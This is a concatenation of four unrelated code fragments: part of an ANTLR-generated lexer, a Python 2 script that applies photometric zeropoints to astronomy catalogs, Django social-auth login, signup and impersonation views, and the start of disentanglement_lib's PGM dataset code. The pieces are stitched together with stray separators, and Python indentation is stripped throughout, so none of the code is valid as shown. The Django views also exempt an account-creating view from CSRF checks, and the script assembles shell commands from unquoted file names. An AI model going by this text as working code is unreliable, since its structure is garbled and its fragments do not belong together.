"EXPR_LT", "EXPR_LTE", "EXPR_NOT_EQUAL", "EXPR_ASSIGN", "EXPR_IDENTIFIER",
"EXPR_INTEGER_CONSTANT", "EXPR_STRING_CONSTANT" ]
ruleNames = [ "TEXT", "LINE_COMMENT", "COMMENT", "DEBUG", "ELIF", "ELSE",
"ENDIF", "ERROR", "EXPRESSION", "IF", "INCLUDE", "NOTICE",
"SUBSTITUTE", "SDOC2_COMMAND", "SIMPLE_OBRACE", "SIMPLE_CBRACE",
"SIMPLE_ARG", "EXPR_OBRACE", "EXPR_CBRACE", "EXPR_WS",
"EXPR_LEFT_PAREN", "EXPR_RIGHT_PAREN", "EXPR_LEFT_BRACKET",
"EXPR_RIGHT_BRACKET", "EXPR_MULT", "EXPR_DIV", "EXPR_ADD",
"EXPR_MINUS", "EXPR_EQUAL", "EXPR_GT", "EXPR_GTE", "EXPR_LOGICAL_AND",
"EXPR_LOGICAL_OR", "EXPR_LT", "EXPR_LTE", "EXPR_NOT_EQUAL",
"EXPR_ASSIGN", "EXPR_IDENTIFIER", "EXPR_INTEGER_CONSTANT",
"EXPR_NON_DIGIT", "EXPR_DIGIT", "ESCAPED_CHAR", "EXPR_STRING_CONSTANT" ]
grammarFileName = "sdoc1Lexer.g4"
def __init__(self, input=None):
super().__init__(input)
self.checkVersion("4.5.3")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
|
|
#!/usr/bin/env python
#adam-use# put bigmacs zps in cats and headers of coadd.fits and calculate NFILT
#adam-example# ipython -i -- adam_bigmacs_apply_zps_and_add_NFILT.py -i /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1226+21/PHOTOMETRY_W-C-RC_aper/MACS1226+21.unstacked.split_apers.cat -o /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1226+21/PHOTOMETRY_W-C-RC_aper/MACS1226+21.calibrated.cat -z /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1226+21/PHOTOMETRY_W-C-RC_aper/MACS1226+21.bigmacs_cleaned_offsets.list
#adam-example# ipython -i -- adam_bigmacs_apply_zps_and_add_NFILT.py -i /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.unstacked.split_apers.cat -o /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.calibrated_PureStarCalib.cat -z /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.bigmacs_cleaned_offsets-PureStarCalib.list
#adam-example# ipython -i -- adam_bigmacs_apply_zps_and_add_NFILT.py -i /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.stars.split_apers.cat -o /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.stars.calibrated_PureStarCalib.cat -z /nfs/slac/kipac/fs1/u/awright/SUBARU/photometry/MACS1115+01/PHOTOMETRY_W-C-RC_aper/MACS1115+01.bigmacs_cleaned_offsets-PureStarCalib.list
#####################
# Manually set a zeropoint for a fitid, such as from SLR
#####################
import sys, os, re,glob
sys.path.append('/u/ki/awright/quick/pythons/')
import imagetools, cattools
import header_key_add
import ldac, utilities
import astropy.io.fits as pyfits
import numpy
ns=globals()
######################
def calc_NFILT_with_numobs(catinput,mag_aper1_keys):
''' Calculate NFILT, this time properly accounting for everything'''
mag_aper1_sdr={} #get a system of distinct representatives (SDR)
for mag_key in mag_aper1_keys:
filt=mag_key[mag_key.find('W-'):]
if filt in mag_aper1_sdr:
mag_aper1_sdr[filt].append(mag_key)
else:
mag_aper1_sdr[filt]=[mag_key]
print 'mag_aper1_sdr=',mag_aper1_sdr
#catinput=ldac.openObjectFile(mag_fl)
catshape=catinput[mag_aper1_sdr.values()[0][0]].shape
NFILT_corrected=numpy.zeros(catshape,dtype=numpy.float32)
for filt in mag_aper1_sdr.keys():
mag_aper1_keys_clean=mag_aper1_sdr[filt]
observed_in_filt=numpy.zeros(catshape,dtype=bool)
printstr=[]
for mag_key in mag_aper1_keys_clean:
flux_key=mag_key.replace("MAG_APER1","FLUX_APER1")
fluxerr_key=flux_key.replace("FLUX","FLUXERR")
ef=catinput[fluxerr_key].copy()
observed=(ef>0.)
observed_in_filt+=observed
if len(mag_aper1_keys_clean)>1:
if mag_key.find('10_3')>0:
mag_key_10_3=mag_key
observed_10_3=observed.copy()
if mag_key.find('10_2')>0:
mag_key_10_2=mag_key
observed_10_2=observed.copy()
printstr+=['\t%s\t## observed: %i (of %i). Percentage: %.1f ## ' % (mag_key,observed.sum(),observed.__len__(),100*observed.mean())]
NFILT_corrected+=numpy.array(observed_in_filt,dtype=numpy.float32)
## check how the data looks
print '\n%s\n## observed_in_filt: %i (of %i). Percentage: %.1f ## ' % (filt,observed_in_filt.sum(),observed_in_filt.__len__(),100*observed_in_filt.mean())
## combine the different mags
if len(mag_aper1_keys_clean)>1:
print '\n'.join(printstr)
#mag_both=numpy.where(observed_10_2,catinput[mag_key_10_2],catinput[mag_key_10_3])
#flux_both=numpy.where(observed_10_2,catinput[mag_key_10_2.replace("MAG_APER1","FLUX_APER1")],catinput[mag_key_10_3.replace("MAG_APER1","FLUX_APER1")])
#emag_both=numpy.where(observed_10_2,catinput[mag_key_10_2.replace("MAG_APER1","MAGERR_APER1")],catinput[mag_key_10_3.replace("MAG_APER1","MAGERR_APER1")])
#eflux_both=numpy.where(observed_10_2,catinput[mag_key_10_2.replace("MAG_APER1","FLUXERR_APER1")],catinput[mag_key_10_3.replace("MAG_APER1","FLUXERR_APER1")])
return NFILT_corrected
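## illustrative sketch (never called anywhere): how the SDR grouping above buckets
## MAG_APER1 keys by filter; the key names below are hypothetical examples only.
def _demo_sdr_grouping():
    demo_keys=['MAG_APER1-SUBARU-10_3-1-W-J-V','MAG_APER1-SUBARU-10_2-1-W-J-V','MAG_APER1-SUBARU-10_3-1-W-C-RC']
    demo_sdr={}
    for mag_key in demo_keys:
        filt=mag_key[mag_key.find('W-'):]
        demo_sdr.setdefault(filt,[]).append(mag_key)
    return demo_sdr ## -> {'W-J-V': [10_3 key, 10_2 key], 'W-C-RC': [10_3 key]}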
######################
def getZP(zpfile):
try:
zpf = open(zpfile).readlines()
zps = {}
for line in zpf:
if line.startswith('#') or line.startswith('psf'):continue
tokens = line.split()
fitFilter = tokens[0]
zpoffset = float(tokens[1])
zperr = float(tokens[2])
zps[fitFilter] = (zpoffset, zperr)
return zps
except:
ns.update(locals())
raise
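## sketch of the zeropoint list format getZP() assumes (values hypothetical):
## one whitespace-separated row per fit filter; '#' and 'psf' rows are skipped, e.g.
##   MAG_APER1-SUBARU-10_3-1-W-J-V   0.042   0.003
## which comes back as zps={'MAG_APER1-SUBARU-10_3-1-W-J-V': (0.042, 0.003)}.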
#######################
def main(flinput,flzps,flnew):
try:
filt_zp_err=getZP(flzps)
catinput=ldac.openObjectFile(flinput)
mag_aper1_keys=filt_zp_err.keys()
NFILT=calc_NFILT_with_numobs(catinput,mag_aper1_keys)
flproto=flinput.replace(".cat",".proto-tmp.cat")
other_keys_del=[] #this will get built up in the loop
ncs=[]
zp_tab_cols=[]
for mag_key in mag_aper1_keys:
zp,err_zp=filt_zp_err[mag_key]
col_zp=pyfits.Column(name='ZP_'+mag_key, format='E', array = numpy.array([zp]))
col_err_zp=pyfits.Column(name='ZPERR_'+mag_key, format='E', array = numpy.array([err_zp]))
zp_tab_cols.append( col_zp )
zp_tab_cols.append( col_err_zp )
## add zp,err_zp to image headers and get background/background_rms for this filter
filt=mag_key[mag_key.find('W-'):]
directory='/'.join([os.environ['SUBARUDIR'],os.environ['cluster'],filt,'SCIENCE','coadd_'+os.environ['cluster']+'_*'])
dirs=glob.glob(directory)
for dir in dirs:
if 'OLD' in dir:
continue
if not os.path.isfile(dir+"/coadd.fits"):
raise Exception("there is no file: "+dir+"/coadd.fits")
header_key_add.add_key_val(dir+"/coadd.fits",['ZP_BM','ZPERR_BM'],[zp,err_zp])
##adam-old get background_rms for this filter
##flcatcoadd='/'.join([os.environ['SUBARUDIR'],os.environ['cluster'],filt,'SCIENCE','coadd_'+os.environ['cluster']+'_all','coadd.stars.cat'])
##catcoadd=ldac.openObjectFile(flcatcoadd,"FIELDS")
##back_level=catcoadd["SEXBKGND"][0]
##back_rms=catcoadd["SEXBKDEV"][0]
## calibrate the catalog and conform to bpz input cat setup
#adam# now that I've determined how to distinguish sextractor non-detections and non-observations, apply that here
#adam# main thing I'd like to do is make MAGERR/FLUXERR, where MAG_APER1-*==-99 acceptable to bpz
#adam# My Hypothesis Confirmed by: ds9e ~/data/MACS1226+21/W-J-V/SCIENCE/coadd_MACS1226+21_all/coadd.fits & #load in ~/wtgpipeline/influx_m99_W-J-V.tsv
## calibrate and fix MAG_APER1- and FLUX_APER1-
flux_key=mag_key.replace("MAG_APER1","FLUX_APER1")
magerr_key=mag_key.replace("MAG","MAGERR")
fluxerr_key=flux_key.replace("FLUX","FLUXERR")
m=catinput[mag_key].copy()
if not m.ndim==1: raise Exception("this column doesn't seem to need to be split (shape is "+str(m.shape)+"), but it has APER- in the name. That's weird and contradictory")
f=catinput[flux_key].copy()
em=catinput[magerr_key].copy()
ef=catinput[fluxerr_key].copy()
#mask=f<=0 ## m==-99 ## (mask==nondetected+nonobserved)=True
detected=(f>0.)
nondetected=(f<=0.)*(ef>0) #Flux <=0, meaningful phot. error
nonobserved=(ef<=0.) #Negative errors
frac_zp=10**(-.4*zp)
flux_newcol=f*frac_zp #((f==-99)==nonobserved).all()=True
flux_newcol[nonobserved]=-99
#adam-correct# I did think, briefly, that this was a mistake, but it's correct: frac_zp is a multiplicative factor, so it gets multiplied into the error as well (that's not the case with the mags, because for them the zeropoint is an additive factor and hence doesn't affect the uncertainty)
eflux_newcol=numpy.where(nonobserved,ef,ef*frac_zp)
# use mag=-2.5*numpy.log10(flux) after calibrating the flux (even though m+zp gives the same thing), because fluxes should always be preferred; magnitudes cannot be trusted!
mag_newcol=-2.5*numpy.log10(flux_newcol) #=m+zp
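## worked example (hypothetical numbers): for zp=0.5, frac_zp=10**(-0.2)~=0.631,
## so flux f -> 0.631*f and mag -2.5*log10(0.631*f) = -2.5*log10(f) + 0.5 = m + zp,
## confirming the multiplicative-flux / additive-mag equivalence noted above.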
# for sextractor, both nonobs and nondet are -99 (for bpz unobs=-99 and undet=+99)
mag_newcol[nonobserved+nondetected]=-99
f_bpz=flux_newcol.copy()
ef_bpz=eflux_newcol.copy()
# previously I'd had f_bpz[nonobserved+nondetected]=0, and that was wrong!
f_bpz[nonobserved]=0
ef_bpz[nonobserved]=0
#m_bpz=mag_newcol.copy()
#em_bpz=em.copy()
#m_bpz[nonobserved+nondetected]=0
#em_bpz[nonobserved]=0
#adam-new# do this check on the calculations to put my mind at ease
m_check=m.copy()+zp
m_check[nonobserved+nondetected]=-99
close_enough=numpy.array([imagetools.isclose(a,b,abs_tol=1e-5) for a,b in zip(mag_newcol,m_check)])
assert(close_enough.all())
#adam-old# Calculate NFILT
#detected=numpy.logical_not(nondetected+nonobserved)
#if len(ncs)==0: NFILT=numpy.zeros(detected.shape,dtype=numpy.float32)
#NFILT+=numpy.array(detected,dtype=numpy.float32)
## check how the data looks
print '\n%s\n## detected: %i ## nondetected: %i ## nonobserved: %i ## ' % (filt,detected.sum(),nondetected.sum(),nonobserved.sum())
print mag_key,' min,mean,max : ',mag_newcol[detected].min(),mag_newcol[detected].mean(),mag_newcol[detected].max()
print flux_key,' min,mean,max : ',flux_newcol[detected].min(),flux_newcol[detected].mean(),flux_newcol[detected].max()
print magerr_key,' min,mean,max : ',em[detected].min(),em[detected].mean(),em[detected].max()
print fluxerr_key,' min,mean,max : ',ef[detected].min(),ef[detected].mean(),ef[detected].max()
ncs.append(pyfits.Column(name=mag_key,format='1E',array=mag_newcol))
ncs.append(pyfits.Column(name=flux_key,format='1E',array=flux_newcol))
ncs.append(pyfits.Column(name=fluxerr_key,format='1E',array=eflux_newcol))
ncs.append(pyfits.Column(name=flux_key+"_bpz_inputs",format='1E',array=f_bpz))
ncs.append(pyfits.Column(name=fluxerr_key+"_bpz_inputs",format='1E',array=ef_bpz))
## no longer needed: fluxerr_newcol magerr_newcol
other_keys_del+=[ mag_key.replace("APER1-","APER-"), flux_key.replace("APER1-","APER-"), magerr_key.replace("APER1-","APER-"), fluxerr_key.replace("APER1-","APER-")]
### adam-old
##inmag=catinput[mag_key].copy()
##influx=catinput[flux_key].copy()
##magerr_newcol=catinput[magerr_key].copy()
##fluxerr_newcol=catinput[fluxerr_key].copy()
##mask=inmag==-99
##mag_newcol=inmag+zp
##non_obs=influx==-99
##non_det=(influx<0)*logical_not(non_obs)
##mag_newcol[non_det]=99
##mag_newcol[non_obs]=-99
##flux_newcol=10.0**(-.4*mag_newcol)# make FLUX_APER1- agree with MAG_APER1-
##flux_newcol[mask]=0 # all(mask==logical_or(non_det,non_obs)) = True
### calibrate and fix FLUXERR_APER1- and MAGERR_APER1-
##fluxerr_newcol[non_det]=back_rms*10**(-.4*zp) #since flux is background subtracted, 1sigma det lim = back_rms
##magerr_newcol[non_det]=-2.5*log10(back_rms)+zp #since flux is background subtracted, 1sigma det mag lim = -2.5*log10(back_rms)
##fluxerr_newcol[non_obs]=0
##magerr_newcol[non_obs]=0
##ncs.append(pyfits.Column(name=magerr_key,format='1E',array=magerr_newcol))
##ncs.append(pyfits.Column(name=fluxerr_key,format='1E',array=fluxerr_newcol))
### print out some of the details here:
##unmasked=logical_not(mask)
##print "\n"+filt+" background RMS=",back_rms," mag of 1sigma det lim =",-2.5*log10(back_rms)+zp
## now add NFILT to ncs and save flproto
ncs.append(pyfits.Column(name='NFILT', format = '1J', array = numpy.array(NFILT,dtype=numpy.int32)))
hdu = pyfits.PrimaryHDU()
hduSTDTAB = pyfits.BinTableHDU.from_columns(ncs)
hduZPSTAB = pyfits.BinTableHDU.from_columns(zp_tab_cols)
hdulist = pyfits.HDUList([hdu,hduSTDTAB,hduZPSTAB])
hdulist[1].header['EXTNAME']='OBJECTS'
hdulist[2].header['EXTNAME']='BIGMACS'
print "\n...temporarily saving to flproto=",flproto
hdulist.writeto(flproto,overwrite=True)
## make a version of flinput with the keys in flproto deleted so that it doesn't give an error in the ldacjoinkey command
## ALSO remove MAG_APER-/FLUX_APER-/MAGERR_APER-/FLUXERR_APER- so I don't confuse it for MAG_APER1-/... later
keys_del=[col.name for col in ncs if not col.name.endswith("_bpz_inputs") and not col.name=="NFILT"]+other_keys_del
flinput2cp=flinput.replace(".cat",".input-tmp.cat")
ooo=os.system("ldacdelkey -i "+flinput+" -o "+flinput2cp+" -k "+' '.join(keys_del))
if ooo!=0: raise Exception("the line os.system(ldacdelkey...) failed")
flnew2cp=flnew.replace(".cat",".new-tmp.cat")
keys_add=[col.name for col in ncs]
print "\nnow running: ldacjoinkey -p "+flproto+" -i "+flinput2cp+" -o "+flnew2cp+" -t OBJECTS -k "+' '.join(keys_add)
ooo=os.system("ldacjoinkey -p "+flproto+" -i "+flinput2cp+" -o "+flnew2cp+" -t OBJECTS -k "+' '.join(keys_add))
if ooo!=0: raise Exception("the line os.system("+"ldacjoinkey -p "+flproto+" -i "+flinput2cp+" -o "+flnew2cp+" -t OBJECTS -k "+" ".join(keys_add)+") failed")
## OK, now make the zps table and add it to the cat. example from photocalibrate_cat.py below
#adam-new# new table with ZPs
str_addtab="ldacaddtab -i "+flnew2cp+" -o "+flnew+" -p "+flproto+" -t BIGMACS"
print "\nnow running: "+str_addtab
ooo=os.system(str_addtab)
if ooo!=0: raise Exception("the line os.system("+str_addtab+") failed")
print "\nsaving to "+flnew
os.system("rm -f "+flproto)
os.system("rm -f "+flinput2cp)
os.system("rm -f "+flnew2cp)
ns.update(locals())
return
except:
ns.update(locals())
raise
#######################
if __name__ == '__main__':
import optparse
parser = optparse.OptionParser()
#example:
# parser.add_option('-3', '--threesec',
# dest='threesec',
# action='store_true',
# help='Treat as a 3second exposure',
# default=False)
#parser.add_option('-c', '--cluster', dest='cluster', help='Cluster name')
#parser.add_option('-f', '--filtername', dest='filter', help='Filter to calibrate')
#parser.add_option('-m', '--maindir', dest='maindir', help='subaru directory')
parser.add_option('-i', '--inputcat',
dest='input_fl',
help='input catalog with vector ldac objects.')
parser.add_option('-o', '--outputcat',
dest='output_fl',
help='output catalog name. ')
parser.add_option('-z', '--zeropoints',
dest='zeropoints_fl',
help='cleaned zeropoints list name. ')
from adam_quicktools_ArgCleaner import ArgCleaner
argv=ArgCleaner()
options, args = parser.parse_args(argv)
#if options.cluster is None:
# parser.error('Need to specify cluster!')
print "Called with:"
print options
if options.input_fl is None:
parser.error('Need to specify input catalog file!')
if options.output_fl is None:
parser.error('Need to specify output catalog file!')
if options.zeropoints_fl is None:
parser.error('Need to specify zeropoints catalog file!')
main(flinput=options.input_fl,flzps=options.zeropoints_fl,flnew=options.output_fl)
|
|
import waffle
from django.contrib import messages
from django.contrib.messages.api import add_message
from django.db.models import Q
from django.conf import settings
from django.http.response import HttpResponseRedirect
from django.http.response import Http404
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse, resolve
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_exempt
from social_core.actions import do_complete
from social_django.utils import psa, load_backend, load_strategy
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth import logout, login, REDIRECT_FIELD_NAME, authenticate
from social_core.backends.utils import load_backends, get_backend
from social_django.views import _do_login
from social_django.views import complete as social_complete
from social_core.exceptions import AuthMissingParameter
from accounts.models import Profile, Instructor
from core.common.utils import get_onboarding_percentage, get_redirect_url
from psa.custom_django_storage import CustomCode
from psa.utils import render_to
from psa.models import SecondaryEmail
from psa.forms import SignUpForm, EmailLoginForm, CompleteEmailForm
def context(**extra):
"""
Adding default context to rendered page.
"""
return dict({
'available_backends': load_backends(settings.AUTHENTICATION_BACKENDS),
}, **extra)
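# Usage sketch: context(form=form, next='/dashboard/') merges the extra keys over
# the default 'available_backends' entry (the extras shown here are hypothetical).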
@render_to('psa/custom_login.html')
def validation_sent(request):
"""
View to handle validation_send action.
"""
user = request.user
social_list = []
email = request.session.get('email_validation_address')
if user and user.is_anonymous():
by_secondary = [i.provider.provider for i in
SecondaryEmail.objects.filter(email=email)
if not i.provider.provider == u'email']
social_list.extend(by_secondary)
users_by_email = User.objects.filter(email=email)
for user_by_email in users_by_email:
by_primary = [i.provider for i in
user_by_email.social_auth.all()
if not i.provider == u'email' and
not SecondaryEmail.objects.filter(
~Q(email=email), provider=i, user=user_by_email
).exists()]
social_list.extend(by_primary)
return context(
validation_sent=True,
email=email,
social_propose=bool(social_list),
social_list=social_list
)
def custom_login(request, template_name='psa/custom_login.html', login_form_cls=EmailLoginForm):
"""
Custom login to integrate social auth and default login.
"""
# We need to check the request for 'next' before doing anything else
next_page = request.POST.get('next') or request.GET.get('next')
if request.user.is_authenticated() and not request.user.is_anonymous():
return redirect(next_page or get_redirect_url(request.user))
u_hash_sess = request.session.get('u_hash')
# logout(request)
if u_hash_sess:
request.session['u_hash'] = u_hash_sess
kwargs = dict(available_backends=load_backends(settings.AUTHENTICATION_BACKENDS))
form_initial = {'u_hash': request.POST.get('u_hash')}
if next_page:
form_initial.update({
'next': next_page
})
if request.POST:
form = login_form_cls(request.POST, initial=form_initial)
if form.is_valid():
user = form.get_user()
if user is not None:
if user.is_active:
login(request, user)
return redirect(next_page or get_redirect_url(user))
else:
return redirect('inactive-user-error')
messages.error(request, "We could not authenticate you, please correct errors below.")
else:
form = login_form_cls(initial=form_initial)
kwargs['form'] = form
if next_page:
kwargs['next'] = next_page
return render(
request,
template_name,
kwargs
)
@never_cache
@csrf_exempt
@psa('ctms:email_sent')
def custom_complete(request, backend, u_hash, u_hash_sess, *args, **kwargs):
"""Authentication complete view"""
if u_hash and u_hash == u_hash_sess:
# if an invited tester is joining a course - create the user immediately, without a confirmation email.
data = request.POST.dict().copy()
user = request.backend.strategy.create_user(**data)
user.backend = 'django.contrib.auth.backends.ModelBackend'
user = authenticate(username=user.username, password=data.get('password'))
login(request, user)
request.session['u_hash'] = u_hash
response = do_complete(
request.backend, _do_login, request.user,
redirect_name=REDIRECT_FIELD_NAME, *args, **kwargs)
if not u_hash or u_hash != u_hash_sess:
# if this is not an invited tester joining a course - log the user out
logout(request)
# add resend_user_email to the session to be able to resend link
request.session['resend_user_email'] = request.POST.get('email')
# getting just created CustomCode
cc = CustomCode.objects.filter(email=request.POST.get('email')).order_by('-id').first()
if cc:
request.session['cc_id'] = cc.id
# remove u_hash from session
request.session.pop('u_hash', None)
if request.user.is_authenticated():
Profile.check_tz(request)
return response
def signup(request):
"""
This function handles custom login to integrate social auth and default login.
"""
default_next_page = reverse('ctms:onboarding')
u_hash = request.POST.get('u_hash')
u_hash_sess = request.session.get('u_hash')
next_page = request.POST.get('next') or request.GET.get('next')
if request.user.is_authenticated() and not request.user.is_anonymous():
return redirect(next_page or get_redirect_url(request.user))
if u_hash and u_hash == u_hash_sess:
# if we have u_hash and it's equal to the u_hash from the session
# replace the next url with the shared_courses page url
if next_page:
request.session['next'] = next_page
form = SignUpForm(initial={'next': next_page, 'u_hash': u_hash})
kwargs = dict(available_backends=load_backends(settings.AUTHENTICATION_BACKENDS))
if request.POST:
data = request.POST.copy()
data['next'] = next_page if next_page else default_next_page
form = SignUpForm(data)
request.POST = data
if form.is_valid():
response = custom_complete(request, 'email', u_hash=u_hash, u_hash_sess=u_hash_sess)
return response
else:
messages.error(
request, "We could not create the account. Please review the errors below."
)
kwargs['form'] = form
kwargs['next'] = next_page
return render(request, 'psa/signup.html', kwargs)
def done(request):
"""
Login complete view, displays user data.
"""
@login_required
@render_to('ct/person.html')
def old_UI_wrap(request):
return context(person=request.user)
@login_required
def new_UI_wrap(request):
if not request.user.course_set.count():
# if newly created user - show create_course page
return HttpResponseRedirect(reverse('ctms:create_course'))
return HttpResponseRedirect(reverse('ctms:my_courses'))
# NOTE: a user with an attached Instructor instance is redirected to /ctms/ (the ctms dashboard)
if getattr(request.user, 'instructor', None):
return new_UI_wrap(request)
return old_UI_wrap(request)
@login_required
@render_to('ct/index.html')
def ask_stranger(request):
"""
View shown to a stranger when asking for their email.
"""
return context(tmp_email_ask=True)
@login_required
@render_to('ct/person.html')
def set_pass(request):
"""
View to handle password set / change action.
"""
changed = False
user = request.user
if user.is_authenticated():
if request.POST:
password = request.POST['pass']
confirm = request.POST['confirm']
if password == confirm:
user.set_password(password)
user.save()
changed = True
if changed:
return context(changed=True, person=user)
else:
return context(exception='Something went wrong...', person=user)
def social_auth_complete(request, *args, **kwargs):
response = social_complete(request, *args, **kwargs)
if request.user.is_authenticated():
Profile.check_tz(request)
return response
def complete(request, *args, **kwargs):
data_to_use = request.POST or request.GET
form = SignUpForm(data_to_use)
post_data = request.POST.copy()
post_data.pop('csrfmiddlewaretoken', None)
# if POST contains only an email field (besides csrf) - it's a login by email.
if len(post_data.keys()) == 1 and 'email' in post_data:
login_by_email = True
form = CompleteEmailForm(request.POST)
if form.is_valid():
post_data.update({
'first_name': '',
'last_name': '',
'institution': '',
})
request.POST = post_data
else:
login_by_email = False
if form.is_valid() or 'verification_code' in request.GET:
try:
resp = social_complete(request, 'email', *args, **kwargs)
if not ('confirm' in request.POST or login_by_email) and request.user.is_authenticated():
Profile.check_tz(request)
return resp
except AuthMissingParameter:
messages.error(request, 'Email already verified.')
if request.user.is_authenticated():
Profile.check_tz(request)
return redirect('ctms:my_courses')
else:
# add message with transformed form errors
err_msg = "\n".join([
"{} - {}".format(
k.capitalize(), ", ".join(i.lower() for i in v)
)
for k, v in form.errors.items()
])
messages.error(
request,
"You passed not correct data. {}".format(err_msg)
)
# if the form is not valid, redirect the user back to the login page
return redirect(reverse("login"))
def login_as_user(request, user_id):
if (request.user.is_authenticated and
request.user.is_staff and
request.user.groups.filter(name='CAN_LOGIN_AS_OTHER_USER').first()
):
user = get_object_or_404(User, id=user_id)
logout(request)
user.backend = 'django.contrib.auth.backends.ModelBackend'
login(request, user)
add_message(request, messages.SUCCESS, "You just switched to user {} with email {}".format(
user.username, user.email
))
return redirect('ct:home')
else:
raise Http404("This action is not allowed")
def inactive_user_error(request):
return render(request, 'accounts/inactive_user_login_error.html')
|
|
# coding=utf-8
# Copyright 2018 The DisentanglementLib Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data sets of Procedurally Generated Matrices (PGMs).
For a description, please refer to https://arxiv.org/abs/1905.12506.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from disentanglement_lib.data.ground_truth import dsprites
from disentanglement_lib.data.ground_truth import dummy_data
from disentanglement_lib.data.ground_truth import ground_truth_data as gtd
from disentanglement_lib.data.ground_truth import named_data
from disentanglement_lib.data.ground_truth import shapes3d
from disentanglement_lib.evaluation.abstract_reasoning import pgm_utils
from disentanglement_lib.utils import resources
from disentanglement_lib.visualize import visualize_util
import gin
import numpy as np
from PIL import Image
import tensorflow.compat.v1 as tf
@gin.configurable("pgm")
def get_pgm_dataset(pgm_type=gin.REQUIRED):
"""Returns a named PGM data set."""
ground_truth_data = named_data.get_named_ground_truth_data()
# Quantization for specific data sets (as described in
# https://arxiv.org/abs/1905.12506).
if isinstance(ground_truth_data, dsprites.AbstractDSprites):
wrapped_data_set = Quantizer(ground_truth_data, [5, 6, 3, 3, 4, 4])
elif isinstance(ground_truth_data, shapes3d.Shapes3D):
wrapped_data_set = Quantizer(ground_truth_data, [10, 10, 10, 4, 4, 4])
elif isinstance(ground_truth_data, dummy_data.DummyData):
wrapped_data_set = ground_truth_data
else:
raise ValueError("Invalid data set.")
# We support different ways to generate PGMs for each of the data sets (e.g.,
# `easy_1`, `hard_3`, `easy_mixed`). `easy` and `hard` refer to the way the
# alternative solutions of the PGMs are generated:
# - `easy`: Alternative answers are random other solutions that do not
# satisfy the constraints in the given PGM.
# - `hard`: Alternative answers are unique random modifications of the
# correct solution which makes the task substantially harder.
if pgm_type.startswith("easy"):
sampling = "easy"
elif pgm_type.startswith("hard"):
sampling = "hard"
else:
raise ValueError("Invalid sampling strategy.")
# The suffix determines how many relations there are:
# - 1-3: Specifies whether always 1, 2, or 3 relations are constant in each
# row.
# - `mixed`: With probability 1/3 each, 1, 2, or 3 relations are constant
# in each row.
if pgm_type.endswith("1"):
relations_dist = [1., 0., 0.]
elif pgm_type.endswith("2"):
relations_dist = [0., 1., 0.]
elif pgm_type.endswith("3"):
relations_dist = [0., 0., 1.]
elif pgm_type.endswith("mixed"):
relations_dist = [1. / 3., 1. / 3., 1. / 3.]
else:
raise ValueError("Invalid number of relations.")
return PGMDataset(
wrapped_data_set,
sampling_strategy=sampling,
relations_dist=relations_dist)
class PGMDataset(object):
"""Class that contains PGM data set based on a GroundTruthData."""
def __init__(self, ground_truth_data, sampling_strategy, relations_dist):
"""Creates a PGMDataset.
Args:
ground_truth_data: GroundTruthData data set used to generate images.
sampling_strategy: Either `easy` or `hard`. For `easy`, alternative
answers are random other solutions that do not satisfy the constraints
in the given PGM. For `hard`, alternative answers are unique random
modifications of the correct solution which makes the task harder.
relations_dist: List with probabilities where the i-th element contains the
probability that i relations are enforced.
"""
self.ground_truth_data = ground_truth_data
self.relations_dist = relations_dist
self.sampling_strategy = sampling_strategy
def sample(self, random_state):
"""Returns a random PGMInstance."""
# Sample the number of relations.
num_relations = 1 + random_state.choice(
len(self.relations_dist), p=self.relations_dist)
# Construct the PGM solution in the space of ground-truth factors.
pgm = pgm_utils.PGM(
random_state,
num_relations,
self.ground_truth_data.factors_num_values,
)
# Sample instances of the images for the solutions and alternative answers.
solution = []
for row in pgm.matrix:
solution.append(
self.ground_truth_data.sample_observations_from_factors(
row, random_state))
alternatives = self.ground_truth_data.sample_observations_from_factors(
pgm.other_solutions, random_state)
# Sample the position of the correct answer.
position = random_state.choice(alternatives.shape[0] + 1)
# Return the instance.
return PGMInstance(
np.array(solution), alternatives, position, pgm.matrix,
pgm.other_solutions, self.ground_truth_data.factors_num_values)
def tf_data_set(self, seed):
"""Returns a tf.data.Dataset.
Args:
seed: Integer with the random seed used to initialize the data set.
Returns:
tf.data.Dataset of the data set.
"""
def generator():
# We need to hard code the random seed so that the data set can be reset.
random_state = np.random.RandomState(seed)
while True:
instance = self.sample(random_state)
yield instance.training_sample()
# We sample a single example to obtain the actual shapes and dtypes.
features, _ = self.sample(np.random.RandomState(0)).training_sample()
features_shapes = {k: v.shape for k, v in features.items()}
features_types = {k: v.dtype for k, v in features.items()}
output_shapes = (features_shapes, tf.TensorShape([]))
output_types = (features_types, tf.int64)
return tf.data.Dataset.from_generator(
generator, output_types=output_types, output_shapes=output_shapes)
def make_input_fn(self, seed, num_batches=None):
"""Creates an input function for the TPU Estimator."""
def input_fn(params):
"""TPUEstimator compatible input fuction."""
dataset = self.tf_data_set(seed)
batch_size = params["batch_size"]
# We need to drop the remainder as otherwise we lose the batch size in the
# tensor shape. This has no effect as our data set is infinite.
dataset = dataset.batch(batch_size, drop_remainder=True)
if num_batches is not None:
dataset = dataset.take(num_batches)
return dataset.make_one_shot_iterator().get_next()
return input_fn
class PGMInstance(object):
